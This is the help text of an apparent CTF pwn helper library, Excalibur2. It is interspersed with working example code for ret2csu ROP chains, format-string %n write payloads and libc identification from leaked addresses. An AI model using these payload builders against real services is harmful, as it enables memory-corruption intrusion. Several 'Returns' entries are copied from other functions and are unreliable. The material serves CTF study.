Excalibur2-help.txt
Help on package Excalibur2:
NAME
Excalibur2
DESCRIPTION
This module provides helper functions for CTF pwn,
including common operations used while learning and in competitions.
Suggestions on the code are welcome.
Please visit https://lmarch2.top/posts/8c945bd4/ for code details
--------------------------------------
Excalibur -- Sword of Contract Victory
--------------------------------------
Example:
>>> from Excalibur2 import *
PACKAGE CONTENTS
Excalibur2
FUNCTIONS
ROPgadget(bin, order, gr='', *option)
------
Descriptions
find the gadget you want using ROPgadget
------
Parameters
bin : binary file
order : the gadget you want
gr : pipe the output through grep (1) or not (0)
option : extra string to search for
------
Returns
elfbase + add
cl lambda (...)
# close()
contextset(ar=64, de=1)
------
Descriptions
set the target architecture and the debug mode
------
Parameters
ar : architecture, amd64 (64) or i386 (32)
de : enable debug mode (1) or not (0)
------
Returns
None
csu(rbx, rbp, r12, r13, r14, r15, csu_end_addr, csu_front_addr, last)
------
Descriptions
ret2csu: build a ROP chain through the __libc_csu_init gadgets
# pop rbx, rbp, r12, r13, r14, r15
# rbx should be 0 (the call goes through [r12 + rbx*8])
# rbp should be 1, so that after add rbx,1 the cmp rbx,rbp check passes and the loop does not jump back
# r12 should point to the function we want to call (e.g. a GOT entry)
# rdi = edi = r15d
# rsi = r14
# rdx = r13
------
Parameters
rbx, rbp, r12, r13, r14, r15 : register values popped by the gadget
csu_end_addr, csu_front_addr, last : the two gadget addresses and the return address used after the call
------
Returns
binsh, system
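The stack layout the csu() parameters describe, written out as an added example in plain Python (struct instead of pwntools, so it runs anywhere); this is not Excalibur2's own implementation. The gadget addresses, the GOT entry and the function pointer used in the comments and in the usage call are made up for the example. csu_chain() mirrors the parameter list above; csu_call() applies the register mapping the help text documents (edi=r15d, rsi=r14, rdx=r13, call through [r12+rbx*8]).

```python
import struct

p64 = lambda v: struct.pack('<Q', v & 0xffffffffffffffff)

# Stack layout consumed by the two __libc_csu_init gadgets, in the variant the
# help text documents (hypothetical addresses, adjust to your binary):
#   csu_end   : pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
#   csu_front : mov rdx, r13; mov rsi, r14; mov edi, r15d; call [r12+rbx*8];
#               add rbx, 1; cmp rbx, rbp; jne csu_front; add rsp, 8;
#               pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret

def csu_chain(rbx, rbp, r12, r13, r14, r15, csu_end_addr, csu_front_addr, last):
    """Return the raw ROP chain bytes, same parameters as Excalibur2.csu()."""
    chain = p64(csu_end_addr)
    chain += b''.join(p64(r) for r in (rbx, rbp, r12, r13, r14, r15))
    chain += p64(csu_front_addr)
    # after the call returns: add rsp,8 skips one qword, then six pops -> 7*8 junk bytes
    chain += b'\x00' * 56
    chain += p64(last)
    return chain

def csu_call(func_ptr, rdi, rsi, rdx, csu_end_addr, csu_front_addr, last):
    """Call *func_ptr(rdi, rsi, rdx) through the gadgets.

    func_ptr must point at a qword holding the function address (a GOT entry,
    or a pointer you wrote into writable memory), because the gadget does
    call [r12 + rbx*8] with rbx = 0, not call r12."""
    if rdi > 0xffffffff:
        # only edi is loaded (mov edi, r15d), which zero-extends into rdi
        raise ValueError('rdi > 0xffffffff is not reachable through edi')
    # rbp = 1 makes `cmp rbx, rbp` succeed after `add rbx, 1`, so the loop exits
    return csu_chain(0, 1, func_ptr, rdx, rsi, rdi, csu_end_addr, csu_front_addr, last)

def parse_chain(chain):
    """Unpack the chain back into qwords so a script can print or verify the layout."""
    return list(struct.unpack('<%dQ' % (len(chain) // 8), chain))

if __name__ == '__main__':
    # hypothetical values: write(1, buf, 0) via the GOT entry of write at 0x601018
    chain = csu_call(0x601018, 1, 0x601100, 0, 0x4005e0, 0x4005c6, 0x400560)
    for i, q in enumerate(parse_chain(chain)):
        print('%2d: %#018x' % (i, q))
```

The register assignment depends on how the toolchain compiled __libc_csu_init: many newer binaries use mov rdx, r14; mov rsi, r13; mov edi, r12d; call [r15+rbx*8], so check the gadget in a disassembler before reusing this order, and note that glibc 2.34 removed __libc_csu_init from linked binaries altogether.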
debug(c=0)
------
Descriptions
run the debugger
To use gdb debugging, pass the command line parameter G, e.g.: python3 exp.py G
------
Parameters
c : gdb command string to run after attaching to the process (default 0: none)
------
Returns
None
el(arg='pwn')
------
Descriptions
load the ELF; the default filename is pwn
------
Parameters
arg : the path of the ELF
------
Returns
None
elsym(add)
------
Descriptions
add the binary base and an offset to get the real address
------
Parameters
add : the offset to add to elfbase
------
Returns
elfbase + add
fmt(offset, begin, end, size, written)
------
Descriptions
format string attack
------
Parameters
offset : offset of the format string argument
begin : address to write to
end : data to write there
size : write granularity of the format string (byte, short or int)
written : number of bytes printf has already written
------
Returns
elfbase + add
# offset (int) - the offset of the first format argument you control
# dict - mapping of target address -> data to write; several entries are allowed: {addr: value, addr2: value2}
# numbwritten (int) - number of bytes printf has already written
# write_size (str) - must be byte, short or int: write byte by byte, by short or by int (hhn, hn or n)
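What those four parameters turn into, as an added example that is not Excalibur2's or pwntools' code: fmt_payload() builds a %n write payload from offset, a {addr: value} dict, numbwritten and write_size, and simulate_writes() replays it the way printf would so the payload can be checked offline before it is sent. The target addresses in the usage call are made up for the example.

```python
import re
import struct

# write_size -> (bytes per write, conversion specifier)
WRITE_SIZES = {'byte': (1, 'hhn'), 'short': (2, 'hn'), 'int': (4, 'n')}

def fmt_payload(offset, writes, numbwritten=0, write_size='byte', bits=64):
    """Build a printf write payload: the specifiers first, the addresses last.

    offset      - stack argument index of the first qword/dword you control
    writes      - {addr: value}; every value is written as 32 bits
    numbwritten - bytes printf printed before reaching our first specifier
    write_size  - 'byte' (%hhn), 'short' (%hn) or 'int' (%n)
    """
    unit, spec = WRITE_SIZES[write_size]
    modulus = 1 << (8 * unit)
    ptr_fmt, ptr_len = ('<Q', 8) if bits == 64 else ('<I', 4)

    # split each 32-bit value into unit-sized pieces, one %n-style write each
    pieces = []
    for addr, value in writes.items():
        for i in range(0, 4, unit):
            pieces.append((addr + i, (value >> (8 * i)) % modulus))
    # printf's counter only grows: ascending targets minimise the padding
    pieces.sort(key=lambda p: p[1])

    # the positional indices depend on how many slots the specifier text
    # occupies, and the text depends on the indices: iterate to a fixed point
    slots = 0
    while True:
        count, fmt = numbwritten, b''
        for k, (addr, target) in enumerate(pieces):
            delta = (target - count) % modulus
            if delta:                       # %0c is not valid, skip a zero pad
                fmt += b'%%%dc' % delta
                count += delta
            fmt += b'%%%d$%s' % (offset + slots + k, spec.encode())
        needed = -(-len(fmt) // ptr_len)    # ceil(len(fmt) / ptr_len)
        if needed == slots:
            break
        slots = needed
    fmt = fmt.ljust(slots * ptr_len, b'A')  # printed after the last write, harmless
    return fmt + b''.join(struct.pack(ptr_fmt, addr) for addr, _ in pieces)

SPEC_WIDTH = {b'hhn': 1, b'hn': 2, b'n': 4}

def simulate_writes(payload, offset, numbwritten=0, bits=64):
    """Replay the payload as printf would, treating the payload itself as the
    stack starting at argument `offset`. Returns {addr: byte} for every byte
    stored, so a script can check the payload before sending it."""
    ptr_fmt, ptr_len = ('<Q', 8) if bits == 64 else ('<I', 4)
    fmt = payload.split(b'\x00', 1)[0]      # printf stops parsing at the first NUL
    mem, count = {}, numbwritten
    for m in re.finditer(rb'%(?:(\d+)c|(\d+)\$(hhn|hn|n))', fmt):
        if m.group(1):                      # %Nc: prints N characters
            count += int(m.group(1))
            continue
        slot = int(m.group(2)) - offset     # %K$hhn: pointer lives in slot K-offset
        addr = struct.unpack(ptr_fmt, payload[slot * ptr_len:(slot + 1) * ptr_len])[0]
        for i in range(SPEC_WIDTH[m.group(3)]):
            mem[addr + i] = (count >> (8 * i)) & 0xff
    return mem

def read_u32(mem, addr):
    """Reassemble a little-endian 32-bit value from the simulated memory."""
    return sum(mem.get(addr + i, 0) << (8 * i) for i in range(4))

if __name__ == '__main__':
    # hypothetical target: overwrite a GOT entry at 0x404018 with 0xdeadbeef
    p = fmt_payload(6, {0x404018: 0xdeadbeef}, write_size='byte')
    print(p)
    print(hex(read_u32(simulate_writes(p, 6), 0x404018)))
```

Two details matter when the payload is used for real: the addresses go after the specifiers because on 64-bit they contain NUL bytes and printf stops parsing the format there, and the 'A' padding keeps the addresses aligned to the argument slot size, so `offset` must be the exact index at which the payload buffer starts on the stack (find it with a `%K$p` probe first).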
get_addr32()
------
Descriptions
Receive a leaked 32-bit libc address
------
Parameters
None
------
Returns
received addr
get_addr64()
------
Descriptions
Receive a leaked 64-bit libc address
------
Parameters
None
------
Returns
received addr
got(fun, *pie_base)
------
Descriptions
GOT address of a function in the binary (an offset when PIE is enabled)
------
Parameters
fun : function name
pie_base (optional) : the binary base when PIE is enabled
------
Returns
got addr of func
ia lambda (...)
# interactive()
int16 lambda data
# int(data,16)
lg lambda name, addr
# log.success(name+'='+hex(addr))
lib(arg='/usr/lib/x86_64-linux-gnu/libc.so.6')
------
Descriptions
load libc; the default is the local system libc
------
Parameters
arg : the path of libc
------
Returns
None
libcsym(fun, off=0)
------
Descriptions
address offset of a libc function
convenient when only one or two libc function addresses are needed
------
Parameters
fun : function name
off (optional) : the libc base, once it is known
------
Returns
addr of libc func
lisym(add)
------
Descriptions
add the libc base and an offset to get the real address
------
Parameters
add : the offset to add to libcbase
------
Returns
libcbase + add
plt(fun, *pie_base)
------
Descriptions
PLT address of a function in the binary (an offset when PIE is enabled)
------
Parameters
fun : function name
pie_base (optional) : the binary base when PIE is enabled
------
Returns
plt addr of func
pr(addr)
shorthand for print
prb(data)
------
Descriptions
print raw bytes without escaping
------
Parameters
data : the data you want to print
------
Returns
None
prh(addr)
shorthand for printing data in hexadecimal
prl(addr)
shorthand for printing the length of data
proc(bin)
------
Descriptions
start the binary locally when the command line parameter R is not given
------
Parameters
bin : the path of binary
------
Returns
p
rc lambda (...)
# recv()
rec lambda data
# recv(data)
remo(ip, port='')
------
Descriptions
connect to the remote target when the command line parameter R is given
------
Parameters
ip : remote ip
port : remote port
use remo(ip) when ip is given as "ip:port" or "ip port"
use remo(ip, port) when ip and port are given separately
------
Returns
p
ru lambda delims, drop=True
# recvuntil(delims,drop)
sd lambda data
# send(data)
sda lambda delim, data
# sendafter(delim,data)
searchlibc(fun, real_addr, agu=0, offset=0)
------
Descriptions
Determine the libc version from the leaked real address of a function, and return the address of the /bin/sh string and of the system function
------
Parameters
fun : function name
real_addr : leaked real address of the function
agu : use a local libc (1) or LibcSearcher (0)
offset : offset between the leaked address and the function's start address
------
Returns
binsh, system
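The identification step behind searchlibc(), together with the get_addr64()/uu64 leak handling, as an added example in plain Python that is not Excalibur2's or LibcSearcher's code. The symbol table LIBC_DB and the leaked bytes are constructed for the example; real offsets come from readelf on the candidate libc or from a libc-database query. The check it demonstrates is the one a practitioner should always make: a candidate libc is only plausible if every leaked symbol gives the same, page-aligned base.

```python
import struct

def uu64(data):
    """Same idea as the uu64 lambda: unpack a leak shorter than 8 bytes."""
    if len(data) > 8:
        raise ValueError('leak longer than 8 bytes: %r' % data)
    return struct.unpack('<Q', data.ljust(8, b'\x00'))[0]

# Constructed symbol table standing in for a libc database. The offsets are
# made up for this example and do not belong to any real libc build.
LIBC_DB = {
    'libc6_2.27-example': {'puts': 0x80aa0, 'system': 0x4f4e0, '/bin/sh': 0x1b40fa},
    'libc6_2.31-example': {'puts': 0x875a0, 'system': 0x55410, '/bin/sh': 0x1b75aa},
}

def match_libc(leaks, db=LIBC_DB):
    """Return {name: base} for every candidate consistent with all leaks.

    leaks is {symbol: leaked address}. A candidate matches when every
    (leaked addr - symbol offset) is the same value and that value is page
    aligned, i.e. the low 12 bits of each leak equal those of the offset."""
    hits = {}
    for name, syms in db.items():
        if not leaks or not all(s in syms for s in leaks):
            continue
        bases = {leaks[s] - syms[s] for s in leaks}
        if len(bases) == 1:
            base = bases.pop()
            if base > 0 and base & 0xfff == 0:
                hits[name] = base
    return hits

def resolve(leaks, db=LIBC_DB):
    """Like searchlibc(): pick the single matching libc and return
    (binsh, system). Refuses to guess when zero or several candidates match,
    because a wrong libc means a wrong system address and a dead target."""
    hits = match_libc(leaks, db)
    if len(hits) != 1:
        raise RuntimeError('libc not uniquely identified, candidates: %s' % sorted(hits))
    (name, base), = hits.items()
    return base + db[name]['/bin/sh'], base + db[name]['system']

if __name__ == '__main__':
    # constructed 6-byte leak, as read from a puts() of its own GOT entry
    raw = b'\xa0\x35\xe4\xf7\xff\x7f'
    leak = uu64(raw)
    print('puts =', hex(leak))
    binsh, system = resolve({'puts': leak})
    print('binsh =', hex(binsh), 'system =', hex(system))
```

When several candidates survive with one leak, the usual fix is to leak a second symbol (the low 12 bits of two symbols together rarely collide between builds) rather than to pick the first hit.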
setbase(add)
------
Descriptions
set the base address of the binary
------
Parameters
add : the base addr of the binary
------
Returns
None
setlibcbase(add)
------
Descriptions
set the base address of libc
------
Parameters
add : the base addr of libc
------
Returns
None
setterminal(termin='tmux', *args)
------
Descriptions
set the terminal used for debugging
------
Parameters
termin : debug terminal (default tmux)
args (optional) : context.terminal = [termin,args]
------
Returns
None
sl lambda data
# sendline(data)
sla lambda delim, data
# sendlineafter(delim,data)
sym(fun, *pie_base)
------
Descriptions
address of a function in the binary (an offset when PIE is enabled)
------
Parameters
fun : function name
pie_base (optional) : the binary base when PIE is enabled
------
Returns
addr of func
uu32 lambda data
# u32(data.ljust(4,b'\x00'))
uu64 lambda data
# u64(data.ljust(8,b'\x00'))
FILE
/home/lctfer/.local/lib/python3.10/site-packages/Excalibur2/__init__.py